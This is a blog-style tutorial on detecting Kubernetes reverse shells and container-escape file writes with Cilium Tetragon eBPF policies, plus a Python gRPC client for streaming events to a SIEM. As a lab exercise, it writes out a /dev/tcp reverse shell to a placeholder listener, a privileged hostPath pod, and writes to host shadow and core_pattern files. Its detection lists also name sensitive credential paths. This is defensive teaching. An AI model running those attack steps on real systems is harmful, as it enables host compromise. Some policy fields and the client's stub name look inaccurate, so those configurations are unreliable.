Real-time k8s Threat Detection with eBPF and Cilium Tetragon
The Observability Blind Spot in Containerized Environments
Traditional security monitoring in Kubernetes, often relying on sidecar containers or node-level agents using ptrace or auditd, faces inherent limitations. These user-space solutions introduce performance overhead, create a larger attack surface, and can be blinded by sophisticated attacks that manipulate syscalls or operate at a level below their instrumentation. For a senior engineer tasked with securing a production cluster, these limitations are not just theoretical; they represent a tangible risk.
The fundamental challenge is the semantic gap between the container runtime and the host kernel. User-space agents have an incomplete picture, while traditional kernel modules are brittle and pose a stability risk. This is where eBPF (extended Berkeley Packet Filter) fundamentally changes the game. By allowing us to run sandboxed programs directly within the Linux kernel, eBPF provides a performant, secure, and programmable way to observe every system call, network packet, and file operation without modifying kernel source code or loading unstable modules.
Cilium Tetragon builds on this foundation, providing a Kubernetes-native abstraction layer over eBPF. It allows us to define security and observability policies as Kubernetes Custom Resources (TracingPolicy), transforming a low-level, powerful technology into a manageable component of our cloud-native stack. This post is not an introduction to eBPF; it's a deep dive into using Tetragon to solve complex, real-world security challenges in a production environment.
We will focus on two specific, high-impact threat scenarios:
Throughout, we will focus on production-grade implementation patterns, performance tuning, and integrating the resulting security signals into a broader monitoring ecosystem.
Prerequisite: Deploying Tetragon with a Production-Ready Configuration
We'll assume you have a running Kubernetes cluster. The standard Tetragon Helm chart installation is a good starting point, but for our purposes, we need a more tailored configuration. We'll enable the gRPC endpoint for external log shipping and ensure the agent is deployed as a DaemonSet on all relevant nodes.
# Add the Cilium Helm repository
helm repo add cilium https://helm.cilium.io/
# Install Tetragon with gRPC export enabled
helm install tetragon cilium/tetragon -n kube-system \
--set tetragon.export.grpc.enabled=true
This basic installation is sufficient for our examples. In a real-world scenario, you would further configure resource limits, node selectors, and potentially custom export configurations in your values.yaml. The key takeaway is that Tetragon agents are now running on each node, ready to enforce our TracingPolicy resources.
To observe the events generated by Tetragon, you can use the tetra CLI. Find a Tetragon pod and stream its logs:
# Find a tetragon pod name
TETRAGON_POD=$(kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon -o jsonpath='{.items[0].metadata.name}')
# Stream the JSON events
kubectl exec -it -n kube-system $TETRAGON_POD -- tetra getevents -o compact
Keep this command running in a separate terminal. It will be our window into the kernel's activity as we trigger our threat scenarios.
Production Pattern 1: Detecting a Reverse Shell with a `TracingPolicy`
A reverse shell is notoriously difficult to detect with traditional network firewalls, as it's an outbound connection, often over a common port like 443. However, at the kernel level, it has a distinct signature: a shell process (/bin/bash, /bin/sh, etc.) directly initiating a TCP socket connection. This is highly anomalous behavior.
Let's craft a TracingPolicy to detect exactly this pattern.
The Scenario: Launching the Attack
First, we deploy a simple pod that gives us the tools (bash, netcat) to simulate the attack.
attacker-pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: attacker-pod
labels:
app: attacker
spec:
containers:
- name: attacker
image: busybox:1.35
command: ["/bin/sh", "-c", "sleep 3600"]
Apply this manifest:
kubectl apply -f attacker-pod.yaml
Now, from a separate terminal, we'll act as the C2 server listening for the incoming connection:
# On your local machine or another server, listen on a port
nc -l -p 1337
Finally, execute the reverse shell from within the attacker-pod:
# Get a shell inside the pod
kubectl exec -it attacker-pod -- /bin/sh
# Inside the pod, connect back to your listener (replace <LISTENER_IP>)
# NOTE: For this to work from a typical k8s pod, <LISTENER_IP> must be publicly accessible
# or on a network reachable from the pod.
/bin/sh -i >& /dev/tcp/<LISTENER_IP>/1337 0>&1
This command redirects the shell's standard input, output, and error to a TCP socket connected to our listener. You should now have a remote shell on your nc listener.
The Detection Policy
Without a specific policy, Tetragon will report the exec and connect calls, but it won't correlate them or flag them as malicious. We need to tell it what to look for. This TracingPolicy uses a kprobe on tcp_connect to inspect every attempt to initiate a TCP connection.
policy-reverse-shell.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: "detect-reverse-shell"
spec:
kprobes:
- call: "tcp_connect"
return: false
args:
- index: 0
type: "sock"
selectors:
- matchPids:
- operator: "In"
followForks: true
values:
- 1
matchBinaries:
- operator: "In"
values:
- "/bin/bash"
- "/bin/sh"
- "/usr/bin/bash"
- "/usr/bin/sh"
matchActions:
- action: "FollowFd"
argFd: 0
argName: "sock_fd"
Let's break down this policy's advanced features:
* kprobes: We are attaching to a kernel function, tcp_connect, which is the entry point for initiating a TCP connection. This is far more efficient than tracing the user-space connect() syscall, as it's a single, stable point of instrumentation.
args: We are capturing the first argument (index: 0) of tcp_connect, which is a struct sock . This is a kernel data structure representing the socket.
selectors: This is where the magic happens. We are filtering events inside the kernel* before they are ever sent to the user-space agent, which is critical for performance.
* matchPids: We're looking at processes that are descendants of PID 1 within their namespace (followForks: true). This correctly scopes our search to processes running inside a container.
* matchBinaries: The core of our logic. We only care about tcp_connect calls originating from common shell binaries. This dramatically reduces noise.
* matchActions: This is a powerful Tetragon feature. FollowFd tells Tetragon to correlate this kernel event with a file descriptor. When the process later uses this socket (e.g., with sendto, recvfrom), Tetragon will be able to link that activity back to this initial connection event. We are associating the socket (argFd: 0) with the name sock_fd for future correlation.
Apply the policy:
kubectl apply -f policy-reverse-shell.yaml
Now, re-run the reverse shell attack. In your tetra getevents output, you will see a specific, actionable event.
Analyzing the Event
The output from tetra getevents will be a rich JSON object. Here is an annotated example of what you should see:
{
"process_kprobe": {
"process": {
"pid": 31337,
"uid": 0,
"cwd": "/",
"binary": "/bin/sh",
"arguments": "-i",
"pod": {
"namespace": "default",
"name": "attacker-pod",
"container": { "id": "cri-o://...", "name": "attacker" }
}
},
"parent": {
"pid": 31300,
"uid": 0,
"binary": "/bin/sh"
},
"func_name": "tcp_connect",
"args": [
{
"sock_arg": {
"family": "AF_INET",
"state": "TCP_SYN_SENT",
"sport": 54321,
"dport": 1337,
"saddr": "10.0.1.123",
"daddr": "<YOUR_LISTENER_IP>"
}
}
]
},
"node_name": "k8s-worker-1",
"time": "2023-10-27T18:42:00.123Z"
}
This single event gives us everything we need for a high-fidelity alert:
* Who: process.binary is /bin/sh running in the attacker-pod in the default namespace.
* What: The func_name is tcp_connect.
* Where: The connection is from the pod's IP (saddr) to our listener IP (daddr) on port 1337 (dport).
This is not just a log entry; it's a verifiable security finding with full context, generated with minimal performance overhead.
Production Pattern 2: Detecting Container Escape via Host File Access
A more sophisticated attack involves a compromised process inside a container attempting to access or modify sensitive files on the host node. This is a classic container escape pattern. A common technique is to manipulate /proc/sys/kernel/core_pattern, which can be exploited to achieve code execution on the host.
We will create a policy to detect any write attempts to sensitive host files from within a containerized process.
The Scenario: Attempting Host File Manipulation
For this, we need a privileged pod that can mount parts of the host's filesystem.
privileged-pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: privileged-pod
spec:
containers:
- name: privileged-container
image: ubuntu:latest
command: ["/bin/bash", "-c", "sleep 3600"]
securityContext:
privileged: true
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
Warning: Running privileged pods is a significant security risk. This manifest is for demonstration purposes only.
Apply the manifest and get a shell into the pod:
kubectl apply -f privileged-pod.yaml
kubectl exec -it privileged-pod -- /bin/bash
From inside the pod, attempt to write to a sensitive host file mounted at /host:
# Inside the pod
echo "malicious content" > /host/etc/shadow.test
echo "|/tmp/malicious-script" > /host/proc/sys/kernel/core_pattern
The Detection Policy
Our TracingPolicy will use a tracepoint on sys_enter_write, which fires every time the write() syscall is entered. We will filter these events based on the file path.
policy-host-file-access.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: "detect-host-file-access"
spec:
tracepoints:
- subsystem: "syscalls"
event: "sys_enter_write"
args:
- index: 1
type: "char_buf"
sizeArgIndex: 2 # The size of the buffer is the 3rd argument to write()
selectors:
- matchArgs:
- index: 0 # The file descriptor argument
operator: "Equal"
values:
- "-1" # Placeholder, as we match on filename below
- index: 4 # Tetragon adds a filename argument at index 4 for file-related syscalls
operator: "Prefix"
values:
- "/etc/shadow"
- "/etc/passwd"
- "/proc/sys/kernel/core_pattern"
- "/root/.ssh/authorized_keys"
matchActions:
- action: "Sigkill"
This policy introduces several new advanced concepts:
* tracepoints: Instead of a kprobe, we're using a tracepoint. Tracepoints are stable, well-defined hooks in the kernel, making them more reliable across kernel versions than kprobes on arbitrary functions.
* matchArgs: We are now filtering based on the arguments to the syscall.
* index: 4: This is a Tetragon-specific feature. For syscalls that operate on file descriptors, Tetragon resolves the fd to a filename and makes it available as an additional argument at index 4 for filtering.
operator: "Prefix": We are matching on any write to files starting with* these sensitive paths. This is more robust than an exact match.
* matchActions.action: "Sigkill": This is the most critical part. We are not just detecting; we are actively preventing. When this policy matches, Tetragon will send a SIGKILL signal to the offending process, terminating it immediately. This moves us from runtime detection to runtime enforcement.
Apply the policy:
kubectl apply -f policy-host-file-access.yaml
Analyzing the Event and Enforcement
Now, re-run the file write attempts from within the privileged-pod. The moment you execute the echo command, your shell session will be terminated (Killed).
In your tetra getevents output, you will see an event like this:
{
"process_tracepoint": {
"process": {
"pid": 45678,
"uid": 0,
"binary": "/usr/bin/bash",
"pod": {
"namespace": "default",
"name": "privileged-pod",
...
}
},
"subsys": "syscalls",
"event": "sys_enter_write",
"args": [
{ "fd_arg": { "fd": 1 } },
{ "bytes_arg": "|/tmp/malicious-script\n" },
{ "size_arg": 24 },
null,
{ "file_arg": { "path": "/proc/sys/kernel/core_pattern" } }
],
"action": "ACTION_KILL"
},
...
}
Key takeaways from this event:
* The file_arg.path clearly shows the target file was /proc/sys/kernel/core_pattern.
* The bytes_arg shows the exact content being written.
* Most importantly, the action field is ACTION_KILL, confirming that our enforcement policy was triggered.
Advanced Topic: Performance Tuning and Event Filtering
While eBPF is highly performant, tracing every syscall in a busy cluster can still generate a significant volume of data. The key to a scalable production deployment is aggressive in-kernel filtering.
Consider a policy that traces all file opens (sys_enter_openat). On a typical node, this could generate thousands of events per second.
Inefficient Policy (AVOID):
# DO NOT USE IN PRODUCTION
spec:
tracepoints:
- subsystem: "syscalls"
event: "sys_enter_openat"
This policy sends every openat event from the kernel to the user-space Tetragon agent for filtering. This is wasteful.
Efficient Policy (PREFERRED):
# PREFERRED PRODUCTION PATTERN
spec:
tracepoints:
- subsystem: "syscalls"
event: "sys_enter_openat"
selectors:
- matchArgs:
- index: 4 # The filename argument
operator: "Equal"
values:
- "/etc/secrets/api-key.txt"
matchNamespaces:
- namespace: "Pid"
operator: "NotIn"
values:
- "host_ns"
This revised policy applies two filters at the eBPF level:
/etc/secrets/api-key.txt.matchNamespaces to exclude events originating from the host PID namespace, effectively focusing only on containerized processes.By pushing the filtering logic into the kernel, we reduce the data transfer and user-space processing by orders of magnitude. When writing policies, always ask: "Can this filter be applied in the kernel using selectors?"
Integrating with SIEM via gRPC
Observing events on the command line is useful for debugging, but a real security pipeline requires programmatic access. We enabled Tetragon's gRPC endpoint during installation for this purpose. Here is a Python script demonstrating how to connect to a Tetragon agent and stream events.
First, you need the protobuf definitions. You can fetch them from the Cilium repository.
# You'll need grpcio-tools
pip install grpcio-tools
# Clone the cilium repo (or download the proto files)
git clone https://github.com/cilium/cilium.git
# Generate the Python code
python -m grpc_tools.protoc -I./cilium/api/v1/tetragon/ \
--python_out=. --grpc_python_out=. ./cilium/api/v1/tetragon/tetragon.proto
Now, you can use this Python client to connect to the agent. You'll need to port-forward the Tetragon agent's gRPC port (54321) to your local machine.
# Find a tetragon pod
TETRAGON_POD=$(kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon -o jsonpath='{.items[0].metadata.name}')
# Port forward the gRPC service
kubectl port-forward -n kube-system $TETRAGON_POD 54321:54321
grpc_client.py
import grpc
import tetragon_pb2
import tetragon_pb2_grpc
from google.protobuf.json_format import MessageToJson
def run():
# Connect to the gRPC server exposed via port-forward
with grpc.insecure_channel('localhost:54321') as channel:
stub = tetragon_pb2_grpc.FineGuidanceSensorsStub(channel)
# Create a request to get all events
# You can add filters here to reduce the stream from the server side
request = tetragon_pb2.GetEventsRequest()
print("Connecting to Tetragon gRPC stream...")
try:
responses = stub.GetEvents(request)
for response in responses:
# For this example, we just print the JSON representation
# In a real system, you'd parse this and send to a SIEM/alerting system
# The response object can be one of several types
if response.HasField('process_kprobe'):
print("--- KPROBE EVENT ---")
print(MessageToJson(response.process_kprobe))
elif response.HasField('process_tracepoint'):
print("--- TRACEPOINT EVENT ---")
print(MessageToJson(response.process_tracepoint))
# Add other event types as needed (e.g., process_exec, process_exit)
except grpc._channel._Rendezvous as err:
print(f"gRPC connection error: {err}")
if __name__ == '__main__':
run()
This script establishes a persistent connection and streams events in real-time. In a production pipeline, this script would be the bridge between Tetragon and your SIEM (Splunk, Elastic) or alerting system (Alertmanager), allowing you to build dashboards, alerts, and long-term storage for forensic analysis based on these rich, kernel-level security signals.
Conclusion
By moving security observability from user-space into the kernel with eBPF, we gain a fundamentally more secure and performant foundation. Cilium Tetragon provides the necessary Kubernetes-native abstractions to make this power accessible and manageable.
We've moved beyond simple theory to implement specific, production-grade detection policies for high-stakes threats like reverse shells and container escapes. We've demonstrated not just detection but also active prevention using Sigkill. Furthermore, we've addressed the critical senior-level concern of performance by emphasizing in-kernel filtering and showcased how to complete the feedback loop by integrating with external systems via gRPC.
This approach represents a paradigm shift in cloud-native security. It is no longer about instrumenting applications or relying on coarse network policies alone. It's about achieving deep, tamper-resistant visibility into the very core of the system, providing the ground truth needed to detect and respond to the most sophisticated adversaries in our Kubernetes environments.